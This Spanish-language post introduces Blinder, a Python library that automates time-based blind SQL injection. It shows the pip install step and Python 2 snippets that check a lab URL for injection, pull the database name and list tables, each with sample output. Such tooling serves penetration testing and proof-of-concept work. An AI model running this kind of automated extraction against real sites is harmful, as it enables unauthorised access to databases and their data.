Blinder – La biblioteca de Python para automatizar inyecciones SQL
Blinder es una pequeña biblioteca de Python para automatizar inyecciones SQL ciegas basadas en tiempo. Esto mediante el uso de consultas predefinidas como funciones para automatizar un rápido desarrollo de pruebas de conceptos.
Instalación
Puedes instalar Blinder usando el siguiente comando:
pip install blinder
O descargando el código fuente e importándola manualmente a tu proyecto.
Uso
Para usar Blinder, debes importar el módulo Blinder y luego comenzar a usar las funciones principales de Blinder.
Puede usar Blinder “con la versión actual” para hacer lo siguiente:
- Verificar la inyección basada en el tiempo.
- Obtener el nombre de la base de datos.
- Obtener nombres de tablas.
Puedes verificar la inyección en una URL usando el siguiente código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
El resultado de la ejecución será este:
[email protected]:~/Desktop# python check.py True [email protected]:~/Desktop#
Puedes obtener el nombre de la base de datos con el siguiente código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
Y los resultados serán:
[email protected]:~/Desktop# python get-database.py Database name is : db1 [email protected]:~/Desktop#
Para obtener nombres de tablas, puedes usar el siguiente código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
Y los resultados serán:
[email protected]:~/Desktop# python get-tables.py blogs notes [email protected]:~/Desktop#
